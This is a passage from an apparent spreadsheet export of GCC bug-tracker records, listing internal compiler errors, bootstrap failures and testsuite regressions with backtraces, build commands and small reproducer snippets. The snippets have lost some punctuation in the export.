                        ] UNSPEC_BCDADD)
                    (const_vector:V2DF [
                            (const_double:DF 0.0 [0x0.0p+0])
                            (const_double:DF 0.0 [0x0.0p+0])
                        ])))
        ]) /home/seurer/gcc/gcc-test/gcc/testsuite/gcc.target/powerpc/bcd-3.c:30 1753 {*bcdadd_test2}
     (nil))
/home/seurer/gcc/gcc-test/gcc/testsuite/gcc.target/powerpc/bcd-3.c:34:1: internal compiler error: in extract_constrain_insn at recog.c:2213
0x108a9b13 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/home/seurer/gcc/gcc-test/gcc/rtl-error.c:108
0x108a9b6b _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/home/seurer/gcc/gcc-test/gcc/rtl-error.c:119
0x1086fa67 extract_constrain_insn(rtx_insn*)
	/home/seurer/gcc/gcc-test/gcc/recog.c:2213
0x10874e1f copyprop_hardreg_forward_1
	/home/seurer/gcc/gcc-test/gcc/regcprop.c:794
0x10875eb7 execute
	/home/seurer/gcc/gcc-test/gcc/regcprop.c:1301</t>
  </si>
  <si>
    <t>GCC-71981</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE at -O2 and -O3 on x86_64-linux-gnu (internal compiler error: in get_dynamic_type at ipa-polymorphic-call.c:1667)</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160722 (experimental) [trunk revision 238670] (GCC)
$
$ gcc-trunk -c -w -O2 small.c
small.c: In function â€˜mainâ€™:
small.c:7:1: internal compiler error: in get_dynamic_type at ipa-polymorphic-call.c:1667
 int main() { fn1() return 0 }
 ^~~
0x9de9ae ipa_polymorphic_call_context::get_dynamic_type(tree_node* tree_node* tree_node* gimple*)
	../../gcc-source-trunk/gcc/ipa-polymorphic-call.c:1667
0x9feb91 ipa_compute_jump_functions_for_edge
	../../gcc-source-trunk/gcc/ipa-prop.c:1651
0x9feb91 ipa_compute_jump_functions_for_bb
	../../gcc-source-trunk/gcc/ipa-prop.c:1765
0x9feb91 analysis_dom_walker::before_dom_children(basic_block_def*)
	../../gcc-source-trunk/gcc/ipa-prop.c:2283
0x12319c2 dom_walker::walk(basic_block_def*)
	../../gcc-source-trunk/gcc/domwalk.c:265
0xa024ec ipa_analyze_node(cgraph_node*)
	../../gcc-source-trunk/gcc/ipa-prop.c:2353
0x128c3af ipcp_generate_summary
	../../gcc-source-trunk/gcc/ipa-cp.c:4655
0xaf751e execute_ipa_summary_passes(ipa_opt_pass_d*)
	../../gcc-source-trunk/gcc/passes.c:2170
0x7ec838 ipa_passes
	../../gcc-source-trunk/gcc/cgraphunit.c:2295
0x7ec838 symbol_table::compile()
	../../gcc-source-trunk/gcc/cgraphunit.c:2409
0x7eea97 symbol_table::compile()
	../../gcc-source-trunk/gcc/cgraphunit.c:2543
0x7eea97 symbol_table::finalize_compilation_unit()
	../../gcc-source-trunk/gcc/cgraphunit.c:2569
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
$ cat small.c
int **a
static void fn1(char **p1) {
  char s = *p1 b = 
  while (*fn2()[a])
}
int main() { fn1() return 0 }
$</t>
  </si>
  <si>
    <t>GCC-12501</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE in store_expr</t>
  </si>
  <si>
    <t>When compiling libjava for m68k-linux:  
/bin/sh ./libtool --tag=GCJ --mode=compile /cvs/test/m68k/gcc/gcc/gcj -B/cvs/ 
test/m68k/gcc/m68k-linux/libjava/ -B/cvs/test/m68k/gcc/gcc/ --encoding=UTF-8  
-Wno-deprecated -fclasspath= -fbootclasspath=/cvs/test/m68k/gcc/m68k-linux/ 
libjava -g -O2 -MD -MT java/lang/ThreadGroup.lo -MF java/lang/ThreadGroup.d -c  
-o java/lang/ThreadGroup.lo /cvs/gcc/libjava/java/lang/ThreadGroup.java  
/cvs/test/m68k/gcc/gcc/gcj -B/cvs/test/m68k/gcc/m68k-linux/libjava/ -B/cvs/ 
test/m68k/gcc/gcc/ --encoding=UTF-8 -Wno-deprecated -fclasspath=  
-fbootclasspath=/cvs/test/m68k/gcc/m68k-linux/libjava -g -O2 -MD -MT java/lang/ 
ThreadGroup.lo -MF java/lang/ThreadGroup.d -c /cvs/gcc/libjava/java/lang/ 
ThreadGroup.java -fPIC -o java/lang/.libs/ThreadGroup.o  
/cvs/gcc/libjava/java/lang/ThreadGroup.java: In class `java.lang.ThreadGroup':  
/cvs/gcc/libjava/java/lang/ThreadGroup.java: In method  
`java.lang.ThreadGroup.enumerate(java.lang.ThreadGroup[]intboolean)':  
/cvs/gcc/libjava/java/lang/ThreadGroup.java:670: internal compiler error: in  
store_expr at expr.c:4432  
Please submit a full bug report  
with preprocessed source if appropriate.  
See  for instructions.  
Line 4432 is this:  
  if (VOID_TYPE_P (TREE_TYPE (exp)))  
    {  
      /* C++ can generate ?: expressions with a throw expression in one  
	 branch and an rvalue in the other. Here we resolve attempts to  
	 store the throw expression's nonexistent result.  */  
      if (want_value)  
	abort ()  
exp is a CALL_EXPR (calling _Jv_ThrowNullPointerException) inside a COND_EXPR.</t>
  </si>
  <si>
    <t>GCC-19734</t>
  </si>
  <si>
    <t>[3.4 regression] Another ICE on invalid destructor call</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since gcc 3.4.0:
==================================
struct A
void foo() { A::~A() }
==================================
Mainline's error message reads:
bug.cc: In function 'void foo()':
bug.cc:2: internal compiler error: vector VEC(tree) index domain error in
cp_parser_lookup_name at cp/parser.c:14160
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-12019</t>
  </si>
  <si>
    <t>check for working C compiler on newlib targets fails due to missing crt0.o</t>
  </si>
  <si>
    <t>Using gcc mainline to build for some (most?) newlib targets fails when building libstdc++ due to:
checking for C compiler default output... configure: error: C compiler cannot create executables
See `config.log' for more details.
make: *** [configure-target-libstdc++-v3] Error 1
Looking at config.log we see:
configure:2352:  /home/dara/mainline/objdir/gcc/xgcc -B/home/dara/mainline/objdir/gcc/ -
nostdinc -B/home/dara/mainline/objdir/d30v/newlib/ -isystem /home/dara/mainline/objdir/
d30v/newlib/targ-include -isystem /home/dara/mainline/combined/newlib/libc/include -B/tmp/
/d30v/bin/ -B/tmp//d30v/lib/ -isystem /tmp//d30v/include -isystem /tmp//d30v/sys-include -
L/home/dara/mainline/objdir/ld -g -Os -Wa-C -g -Os -Wa-C  conftest.c  &gt;&amp;5
/home/dara/mainline/objdir/gcc/collect-ld: cannot open crt0.o: No such file or directory
Of course crt0.o does exist and has been built. To fix this all we need to do is add -B$OBJDIR/
$TARGET/libgloss/$TARGET to the above command line and gcc will find both crt0.o and libsim.a 
(which is also needed).
Not sure which autoconf variables need hacking though...</t>
  </si>
  <si>
    <t>GCC-63740</t>
  </si>
  <si>
    <t>[4.9 Regression] GCC 4.9.2 bootstrap fails on ARM haifa-sched.c:6507:1: internal compiler error: in lra_create</t>
  </si>
  <si>
    <t>GCC 4.9.2 native bootstrap on ARM fails with ICE from the second stage compiler:
/home/aaro/gcctest/build/./prev-gcc/xg++ -B/home/aaro/gcctest/build/./prev-gcc/ -B/usr/local/arm-unknown-linux-gnueabi/bin/ -nostdinc++ -B/home/aaro/gcctest/build/prev-arm-unknown-linux-gnueabi/libstdc++-v3/src/.libs -B/home/aaro/gcctest/build/prev-arm-unknown-linux-gnueabi/libstdc++-v3/libsupc++/.libs  -I/home/aaro/gcctest/build/prev-arm-unknown-linux-gnueabi/libstdc++-v3/include/arm-unknown-linux-gnueabi  -I/home/aaro/gcctest/build/prev-arm-unknown-linux-gnueabi/libstdc++-v3/include  -I/home/aaro/gcctest/gcc-4.9.2/libstdc++-v3/libsupc++ -L/home/aaro/gcctest/build/prev-arm-unknown-linux-gnueabi/libstdc++-v3/src/.libs -L/home/aaro/gcctest/build/prev-arm-unknown-linux-gnueabi/libstdc++-v3/libsupc++/.libs -c   -g -O2 -gtoggle -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings   -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.9.2/gcc -I../../gcc-4.9.2/gcc/. -I../../gcc-4.9.2/gcc/../include -I../../gcc-4.9.2/gcc/../libcpp/include  -I../../gcc-4.9.2/gcc/../libdecnumber -I../../gcc-4.9.2/gcc/../libdecnumber/dpd -I../libdecnumber -I../../gcc-4.9.2/gcc/../libbacktrace    -o haifa-sched.o -MT haifa-sched.o -MMD -MP -MF ./.deps/haifa-sched.TPo ../../gcc-4.9.2/gcc/haifa-sched.c
../../gcc-4.9.2/gcc/haifa-sched.c: In function 'bool schedule_block(basic_block_def** state_t)':
../../gcc-4.9.2/gcc/haifa-sched.c:6507:1: internal compiler error: in lra_create_copy at lra.c:1532
 }
 ^
0x8a2ac7 lra_create_copy(int int int)
        ../../gcc-4.9.2/gcc/lra.c:1532
0x8cbaaf process_bb_lives
        ../../gcc-4.9.2/gcc/lra-lives.c:568
0x8cd583 lra_create_live_ranges(bool)
        ../../gcc-4.9.2/gcc/lra-lives.c:1008
0x8a51ef lra(_IO_FILE*)
        ../../gcc-4.9.2/gcc/lra.c:2372
0x83df07 do_reload
        ../../gcc-4.9.2/gcc/ira.c:5457
0x83e35b rest_of_handle_reload
        ../../gcc-4.9.2/gcc/ira.c:5598
0x83e3d3 execute
        ../../gcc-4.9.2/gcc/ira.c:5627
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The host GCC is 4.9.2 (cross-compiled on x86_64 using GCC 4.9.2).
Configure command for bootstrap was:
$ ../gcc-4.9.2/configure --with-arch=armv4t --with-float=soft --disable-nls --enable-languages=cc++ --host=arm-unknown-linux-gnueabi --build=arm-unknown-linux-gnueabi --target=arm-unknown-linux-gnueabi --with-system-zlib --with-sysroot=/ --disable-static --enable-shared</t>
  </si>
  <si>
    <t>aaro.koskinen</t>
  </si>
  <si>
    <t>GCC-78338</t>
  </si>
  <si>
    <t>[7 Regression] bootstrap broken on mips-linux-gnu</t>
  </si>
  <si>
    <t>seen with trunk r242048 apparently not seen on 20161106.
x86_64-linux-gnu-g++-7 -fno-PIE -c   -g -O2 -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings   -DHAVE_CONFIG_H -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/../include -I../../src/gcc/../libcpp/include  -I../../src/gcc/../libdecnumber -I../../src/gcc/../libdecnumber/dpd -I../libdecnumber -I../../src/gcc/../libbacktrace   -o host-linux.o -MT host-linux.o -MMD -MP -MF ./.deps/host-linux.TPo ../../src/gcc/config/host-linux.c
In file included from ../../src/gcc/hash-table.h:561:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-map.h: In instantiation of 'static void hash_map   &gt;::hash_entry::ggc_mx(hash_map   &gt;::hash_entry Value = rtx_def* Traits = simple_hashmap_traits rtx_def*&gt;]':
../../src/gcc/hash-table.h:1029:17:   required from 'void gt_ggc_mx(hash_table*) [with E = hash_map::hash_entry]'
../../src/gcc/hash-map.h:251:13:   required from 'void gt_ggc_mx(hash_map*) [with K = nofree_string_hash V = rtx_def* H = simple_hashmap_traits rtx_def*&gt;]'
./gt-mips.h:38:19:   required from here
../../src/gcc/hash-map.h:62:12: error: no matching function for call to 'gt_ggc_mx(rtx_def*&amp;)'
  gt_ggc_mx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
In file included from ../../src/gcc/coretypes.h:346:0
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/wide-int.h:3115:1: note: candidate: template void gt_ggc_mx(generic_wide_int*)
 gt_ggc_mx (generic_wide_int  *)
 ^~~~~~~~~
../../src/gcc/wide-int.h:3115:1: note:   template argument deduction/substitution failed:
In file included from ../../src/gcc/hash-table.h:561:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-map.h:62:12: note:   'rtx_def' is not derived from 'generic_wide_int'
  gt_ggc_mx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
In file included from ../../src/gcc/coretypes.h:346:0
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/wide-int.h:3133:1: note: candidate: template void gt_ggc_mx(trailing_wide_ints*)
 gt_ggc_mx (trailing_wide_ints  *)
 ^~~~~~~~~
../../src/gcc/wide-int.h:3133:1: note:   template argument deduction/substitution failed:
In file included from ../../src/gcc/hash-table.h:561:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-map.h:62:12: note:   'rtx_def' is not derived from 'trailing_wide_ints'
  gt_ggc_mx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
In file included from ../../src/gcc/hash-table.h:235:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/ggc.h:302:1: note: candidate: void gt_ggc_mx(const char*)
 gt_ggc_mx (const char *s)
 ^~~~~~~~~
../../src/gcc/ggc.h:302:1: note:   no known conversion for argument 1 from 'rtx_def*' to 'const char*'
../../src/gcc/ggc.h:313:1: note: candidate: void gt_ggc_mx(int) 
 gt_ggc_mx (int)
 ^~~~~~~~~
../../src/gcc/ggc.h:313:1: note:   conversion of argument 1 would be ill-formed:
In file included from ../../src/gcc/hash-table.h:561:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-map.h:62:15: error: invalid conversion from 'rtx_def*' to 'int' [-fpermissive]
  gt_ggc_mx (e.m_value)
             ~~^~~~~~~
In file included from ../../src/gcc/hash-table.h:236:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/vec.h:1104:1: note: candidate: template void gt_ggc_mx(vec*)
 gt_ggc_mx (vec *v)
 ^~~~~~~~~
../../src/gcc/vec.h:1104:1: note:   template argument deduction/substitution failed:
In file included from ../../src/gcc/hash-table.h:561:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-map.h:62:12: note:   'rtx_def' is not derived from 'vec'
  gt_ggc_mx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
In file included from ../../src/gcc/hash-table.h:236:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/vec.h:1113:1: note: candidate: template void gt_ggc_mx(vec*)
 gt_ggc_mx (vec *v ATTRIBUTE_UNUSED)
 ^~~~~~~~~
../../src/gcc/vec.h:1113:1: note:   template argument deduction/substitution failed:
In file included from ../../src/gcc/hash-table.h:561:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-map.h:62:12: note:   'rtx_def' is not derived from 'vec'
  gt_ggc_mx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
In file included from ../../src/gcc/config/mips/mips.c:30:0:
../../src/gcc/tree.h:5422:13: note: candidate: void gt_ggc_mx(tree_node*&amp;)
 extern void gt_ggc_mx (tree 
             ^~~~~~~~~
../../src/gcc/tree.h:5422:13: note:   no known conversion for argument 1 from 'rtx_def*' to 'tree_node*&amp;'
In file included from ../../src/gcc/coretypes.h:351:0
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-set.h:130:1: note: candidate: template void gt_ggc_mx(hash_set*)
 gt_ggc_mx (hash_set *h)
 ^~~~~~~~~
../../src/gcc/hash-set.h:130:1: note:   template argument deduction/substitution failed:
In file included from ../../src/gcc/hash-table.h:561:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-map.h:62:12: note:   'rtx_def' is not derived from 'hash_set'
  gt_ggc_mx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
In file included from ../../src/gcc/coretypes.h:350:0
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-table.h:1016:1: note: candidate: template void gt_ggc_mx(hash_table*)
 gt_ggc_mx (hash_table *h)
 ^~~~~~~~~
../../src/gcc/hash-table.h:1016:1: note:   template argument deduction/substitution failed:
In file included from ../../src/gcc/hash-table.h:561:0
                 from ../../src/gcc/coretypes.h:350
                 from ../../src/gcc/config/mips/mips.c:26:
../../src/gcc/hash-map.h:62:12: note:   'rtx_def' is not derived from 'hash_table'
  gt_ggc_mx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
../../src/gcc/hash-map.h:249:1: note: candidate: template void gt_ggc_mx(hash_map*)
 gt_ggc_mx (hash_map *h)
 ^~~~~~~~~
../../src/gcc/hash-map.h:249:1: note:   template argument deduction/substitution failed:
../../src/gcc/hash-map.h:62:12: note:   'rtx_def' is not derived from 'hash_map'
  gt_ggc_mx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
../../src/gcc/hash-map.h: In instantiation of 'static void hash_map   &gt;::hash_entry::pch_nx(hash_map   &gt;::hash_entry Value = rtx_def* Traits = simple_hashmap_traits rtx_def*&gt;]':
../../src/gcc/hash-table.h:1064:17:   required from 'void gt_pch_nx(hash_table*) [with D = hash_map::hash_entry]'
../../src/gcc/hash-map.h:258:13:   required from 'void gt_pch_nx(hash_map*) [with K = nofree_string_hash V = rtx_def* H = simple_hashmap_traits rtx_def*&gt;]'
./gt-mips.h:58:19:   required from here
../../src/gcc/hash-map.h:68:12: error: no matching function for call to 'gt_pch_nx(rtx_def*&amp;)'
  gt_pch_nx (e.m_value)
  ~~~~~~~~~~^~~~~~~~~~~
In file included from ../../src/gcc/coretypes.h:346:0</t>
  </si>
  <si>
    <t>GCC-71607</t>
  </si>
  <si>
    <t>[6 Regression] [ARM] ice due to forbidden enabled attribute dependency on instruction operands</t>
  </si>
  <si>
    <t>Created attachment 38738
reduce test case that ice
There is a rule in the 'gcc internals' document that states that 'enabled'
attribute must not depend on the current insn operands.
 But unfortunately such a dependency exists due to 'use_literal_pool' attribute
dependency on operands[1] and 'use_literal_pool' usage in 'enabled'
attribute definition (see arm.md).
 This leads to ice on check_bool_attrs() assertion in recog.c that exactly 
checks that 'enabled' 'preferred_for_size' or 'preferred_for_speed'
are static properties of the subtarget (as stated in gcc internals document
and in check_bool_attrs() comment).
 Find attached a test case that triggers this ice.
&gt;&gt; arm-none-eabi-gcc -c simple.c -mslow-flash-data -O0 -mfloat-abi=hard -march=armv7-m -mthumb -mfpu=vfpv3
will trigger an ice whereas
&gt;&gt; arm-none-eabi-gcc -c simple.c -mno-slow-flash-data -O0 -mfloat-abi=hard -march=armv7-m -mthumb -mfpu=vfpv3
will not.
Mickael</t>
  </si>
  <si>
    <t>mickael.guene</t>
  </si>
  <si>
    <t>GCC-34567</t>
  </si>
  <si>
    <t>module name without a module</t>
  </si>
  <si>
    <t>If I revert the following line from module.c:
Index: module.c
===================================================================
--- module.c    (revision 131134)
+++ module.c    (working copy)
@@ -37327 +37326 @@
              if (st &amp;&amp; only_flag
                     &amp;&amp; !st-&gt;n.sym-&gt;attr.use_only
                     &amp;&amp; !st-&gt;n.sym-&gt;attr.use_rename
-                    &amp;&amp; st-&gt;n.sym-&gt;module
                     &amp;&amp; strcmp (st-&gt;n.sym-&gt;module module_name) == 0)
                st-&gt;name = gfc_get_string (hidden.%s name)
the attached build runs into a segmentation fault.
It is suspected that the above fix just papers over the real problem.
To get the ICE unpack the accompanying tar file and type make all.</t>
  </si>
  <si>
    <t>GCC-7520</t>
  </si>
  <si>
    <t>internal compiler error in verify_local_live_at_start</t>
  </si>
  <si>
    <t>rv2.c:418: Internal compiler error in verify_local_live_at_start at flow.c:583
Release:
3.1.1
Environment:
Linux 2.4.19 on Intel Pentium II
How-To-Repeat:
Run gcc on attached proprocessed file. Here is
a log of gcc -v contains the flags used:
Reading specs from /usr/local/gcc-3.1.1/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/specs
Configured with: ../gcc-3.1.1/configure --prefix=/usr/local/gcc-3.1.1 --enable-languages=c
Thread model: single
gcc version 3.1.1
 /usr/local/gcc-3.1.1/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/cpp0 -lang-c -v -I../common -I/usr/include/X11 -iprefix /usr/local/bin/../lib/gcc-lib/i686-pc-linux-gnu/3.1.1/ -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=1 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__FAST_MATH__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__MMX__ -DSPEED=200 -DBSD -Dlinux -Dtracktime=0 -DDCL_ATOF -DNOSTEREO -DBIGMEM rv2.c rv2.i
GNU CPP version 3.1.1 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/include
ignoring nonexistent directory /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/../../../../i686-pc-linux-gnu/include
ignoring nonexistent directory /usr/local/gcc-3.1.1/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 ../common
 /usr/include/X11
 /usr/local/include
 /usr/local/gcc-3.1.1/include
 /usr/local/gcc-3.1.1/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/include
 /usr/include
End of search list.
 /usr/local/gcc-3.1.1/lib/gcc-lib/i686-pc-linux-gnu/3.1.1/cc1 -fpreprocessed rv2.i -quiet -dumpbase rv2.c -march=pentium2 -malign-double -mno-ieee-fp -O3 -version -ffast-math -fomit-frame-pointer -fstrict-aliasing -o rv2.s
GNU CPP version 3.1.1 (cpplib) (i386 Linux/ELF)
GNU C version 3.1.1 (i686-pc-linux-gnu)
	compiled by GNU C version 3.1.1.
rv2.c: In function `getexposure':
rv2.c:418: Internal compiler error in verify_local_live_at_start at flow.c:583
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-39812</t>
  </si>
  <si>
    <t>[4.5 regression] Revision 146314 failed 8 gnat.dg tests</t>
  </si>
  <si>
    <t>Between:
146303 =&gt; http://gcc.gnu.org/ml/gcc-testresults/2009-04/msg01859.html
146339 =&gt; http://gcc.gnu.org/ml/gcc-testresults/2009-04/msg01961.html
The following tests started failing on the -m32 run:
FAIL: gcc.target/i386/cleanup-1.c execution test
FAIL: gnat.dg/aliased_prefix_accessibility.adb execution test
FAIL: gnat.dg/conv_bug.adb execution test
FAIL: gnat.dg/curr_task.adb execution test
FAIL: gnat.dg/iprot_test.adb execution test
FAIL: gnat.dg/missing_acc_check.adb execution test
FAIL: gnat.dg/not_null.adb execution test
FAIL: gnat.dg/test_enum_io.adb execution test
FAIL: gnat.dg/test_overflow_sum.adb execution test</t>
  </si>
  <si>
    <t>GCC-41419</t>
  </si>
  <si>
    <t>[4.5 regression] many new ACATs failures (breakpoint instruction in object)</t>
  </si>
  <si>
    <t>Starting program: /users/joel/test-gcc/gcc-svn/gcc/testsuite/ada/acats/work-jmr3904/tests/a/a85013b/a85013b 
.. A85013B ACATS 2.5 88-01-01 00:00:00
---- A85013B CHECK THAT A SUBPROGRAM CAN BE RENAMED WITHIN ITS OWN BODY 
                AND THAT THE NEW NAME CAN BE USED IN A RENAMING
                DECLARATION.
Program received signal SIGTRAP Trace/breakpoint trap.
0x88004be8 in system.task_primitives.operations.create_task (t=0x881a2e90 
    wrapper=(system.address) 0x8800c7c8 stack_size= 
    priority=122) at s-taprop.adb:962
962	        Adjusted_Stack_Size - Adjusted_Stack_Size mod Page_Size
Current language:  auto
The current source language is auto currently ada.
(gdb) bt
#0  0x88004be8 in system.task_primitives.operations.create_task (t=0x881a2e90 
    wrapper=(system.address) 0x8800c7c8 stack_size= 
    priority=122) at s-taprop.adb:962
#1  0x8800bbe0 in system.tasking.stages.activate_tasks (
    chain_access=) at s-tassta.adb:291
#2  0x8800390c in _ada_a85013b ()
(gdb) 
When I disassemble at 0x88004be8 I see this:
0x88004be0 :	bnez	s40x88004bec 
0x88004be4 :	divu	zeros5s4
0x88004be8 :	break	0x7
To confirm this was actually in the program executable I objdump'ed it.
88004be0:       16800002        bnez    s488004bec 
88004be4:       02b4001b        divu    zeros5s4
88004be8:       0007000d        break   0x7</t>
  </si>
  <si>
    <t>GCC-61634</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in in vect_get_vec_def_for_operand at tree-vect-stmts.c:1423</t>
  </si>
  <si>
    <t>Created attachment 33018
preprocessed source
Hello
I get the following ICE on current 4_8-branch and 4_9-branch with the attached preprocessed source (taken from opencore-amr-1.3.0):
x86_64-pc-linux-gnu-g++ -x c -O3 -fwrapv -c autocorr.x  -fPIC -DPIC -o autocorr.o
autocorr.x: In function 'Autocorr':
autocorr.x:418:8: internal compiler error: in vect_get_vec_def_for_operand at tree-vect-stmts.c:1423
 Word16 Autocorr(
        ^
Please submit a full bug report
with preprocessed source if appropriate.
-O3 -fwrapv throws ICE
-O2 -fwrapv or plain -O3 pass.</t>
  </si>
  <si>
    <t>GCC-57953</t>
  </si>
  <si>
    <t>no C++11 compliant std::ios_base::failure found</t>
  </si>
  <si>
    <t>Â§27.5.3 states that ios_base defines  a class failure derived from system_error. The only std::ios_base::failure I see in a libstdc++ is a pre-C++11 ones.
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc/src/gcc-4.8.1/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --enable-gnu-unique-object --enable-linker-build-id --enable-cloog-backend=isl --disable-cloog-version-check --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --with-linker-hash-style=gnu --disable-install-libiberty --disable-multilib --disable-libssp --disable-werror --enable-checking=release
Thread model: posix
gcc version 4.8.1 (GCC) 
$ g++ -std=c++11 test.cpp
test.cpp: In function â€˜int main(int char**)â€™:
test.cpp:10:18: error: â€˜class std::ios_base::failureâ€™ has no member named â€˜codeâ€™
   std::cout &lt;&lt; e.code().value() &lt;&lt; std::endl</t>
  </si>
  <si>
    <t>unixway.drive+gcc</t>
  </si>
  <si>
    <t>GCC-69583</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/tree-ssa/sra-17.c scan-tree-dump-times esra Removing load: a = \\*\\.?LC\\.?\\.?0 1</t>
  </si>
  <si>
    <t>spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gc
c/gcc/testsuite/gcc.dg/tree-ssa/sra-17.c -fno-diagnostics-show-caret -fdiagnosti
cs-color=never -O2 -fdump-tree-esra --param sra-max-scalarization-size-Ospeed=32
 -lm -o ./sra-17.exe
PASS: gcc.dg/tree-ssa/sra-17.c (test for excess errors)
Setting LD_LIBRARY_PATH to :/test/gnu/gcc/objdir/gcc:/test/gnu/gcc/objdir/hppa2.
0w-hp-hpux11.11/./libatomic/.libs::/test/gnu/gcc/objdir/gcc:/test/gnu/gcc/objdir
/hppa2.0w-hp-hpux11.11/./libatomic/.libs
spawn [open ...]
PASS: gcc.dg/tree-ssa/sra-17.c execution test
FAIL: gcc.dg/tree-ssa/sra-17.c scan-tree-dump-times esra Removing load: a = \\*
\\.?LC\\.?\\.?0 1
FAIL: gcc.dg/tree-ssa/sra-17.c scan-tree-dump-times esra SR\\.[0-9_]+ = \\*\\.?
LC\\.?\\.?0\\[ 4
Similar fail:
spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gc
c/gcc/testsuite/gcc.dg/tree-ssa/sra-18.c -fno-diagnostics-show-caret -fdiagnosti
cs-color=never -O2 -fdump-tree-esra --param sra-max-scalarization-size-Ospeed=32 -lm -o ./sra-18.exePASS: gcc.dg/tree-ssa/sra-18.c (test for excess errors)
Setting LD_LIBRARY_PATH to :/test/gnu/gcc/objdir/gcc:/test/gnu/gcc/objdir/hppa2.
0w-hp-hpux11.11/./libatomic/.libs::/test/gnu/gcc/objdir/gcc:/test/gnu/gcc/objdir
/hppa2.0w-hp-hpux11.11/./libatomic/.libsspawn [open ...]
PASS: gcc.dg/tree-ssa/sra-18.c execution testFAIL: gcc.dg/tree-ssa/sra-18.c scan-tree-dump-times esra Removing load: a = \\*
\\.?LC\\.?\\.?0 1FAIL: gcc.dg/tree-ssa/sra-18.c scan-tree-dump-times esra SR\\.[0-9_]+ = \\*\\.?
